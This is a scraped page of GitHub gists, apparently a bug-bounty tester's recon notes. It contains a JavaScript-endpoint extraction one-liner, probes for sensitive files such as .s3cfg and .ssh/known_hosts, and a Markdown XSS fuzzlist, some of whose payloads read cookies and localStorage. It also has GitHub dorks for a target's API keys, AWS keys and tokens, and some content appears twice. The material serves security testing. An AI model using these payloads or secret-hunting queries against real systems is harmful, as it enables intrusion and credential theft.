moodiabdoul3

## st8out.sh
#!/bin/bash

#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor

## offsec.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                moodiabdoul3
                / offsec.md
            
            
              Created
              May 9, 2020 20:19
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# debug mode and absolute/relative urls support (the best one):
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d

## Grep-For-Sensitive-Files
/.s3cfg | grep -Hnri "website_endpoint"
/phpunit.xml | grep -Hnri "<\phpunit"
/nginx.conf | grep -Hnri '/var/run/'
/.vimrc | grep -Hnri 'vim-'
/yarn.lock | grep -Hnri 'yarn lockfile'
/.idea/workspace.xml | grep -Hnri '<project version="4">'
/composer.json | grep -Hnri '"autoload"'
/Homestead.yaml | grep -Hnri 'provider: virtualbox'
/Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION'
/.ssh/known_hosts | grep -Hnri 'ssh-rsa'

## short-wordlist.txt
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## vuln_list.txt
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120

## Markdown XSS fuzzlist
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

## github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces

## a-recon-services-list-for-liveoverflow.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                moodiabdoul3
                / a-recon-services-list-for-liveoverflow.md
            
            
              Created
              January 7, 2020 23:16
                — forked from EdOverflow/a-recon-services-list-for-liveoverflow.md
            
          
https://scans.io/
https://commoncrawl.org/
https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
https://www.shodan.io/
https://opendata.rapid7.com/
https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
https://securitytrails.com/
https://threatcrowd.org/
https://dnsdumpster.com/
https://crt.sh/
	#!/bin/bash

	#####
	#
	# St8out - Extra one-liner for reconnaissance
	#
	# Usage: ./st8out.sh target.com
	#
	# Resources:
	# - https://github.com/j3ssie/metabigor
	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# debug mode and absolute/relative urls support (the best one):
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"('#####.)\|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" \| sort -fu" \| tr -d
	/.s3cfg \| grep -Hnri "website_endpoint"
	/phpunit.xml \| grep -Hnri "<\phpunit"
	/nginx.conf \| grep -Hnri '/var/run/'
	/.vimrc \| grep -Hnri 'vim-'
	/yarn.lock \| grep -Hnri 'yarn lockfile'
	/.idea/workspace.xml \| grep -Hnri '<project version="4">'
	/composer.json \| grep -Hnri '"autoload"'
	/Homestead.yaml \| grep -Hnri 'provider: virtualbox'
	/Vagrantfile \| grep -Hnri 'VAGRANTFILE_API_VERSION'
	/.ssh/known_hosts \| grep -Hnri 'ssh-rsa'
	/.s3cfg
	/phpunit.xml
	/nginx.conf
	/.vimrc
	/LICENSE.md
	/yarn.lock
	/Gulpfile
	/Gulpfile.js
	/composer.json
	/.npmignore
	Account Hijacking
	Allocation of Resources Without Limits or Throttling - CWE-770
	Array Index Underflow - CWE-129
	Authentication Bypass Using an Alternate Path or Channel - CWE-288
	Brute Force - CWE-307
	Buffer Over-read - CWE-126
	Buffer Underflow - CWE-124
	Buffer Under-read - CWE-127
	Business Logic Errors - CWE-840
	Classic Buffer Overflow - CWE-120
	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')
	![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
	![Escape SRC - onerror]("onerror="alert('ImageOnError'))
	[XSS](javascript:prompt(document.cookie))
	[XSS](j a v a s c r i p t:prompt(document.cookie))
	[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
	“Hackme.tld” API_key
	“Hackme.tld” secret_key
	“Hackme.tld” aws_key
	“Hackme.tld” Password
	“Hackme.tld” FTP
	“Hackme.tld” login
	“Hackme.tld” github_token
	“Hackme.tld” http:// & https://
	“Hackme.tld” amazonaws
	“Hackme.tld” digitaloceanspaces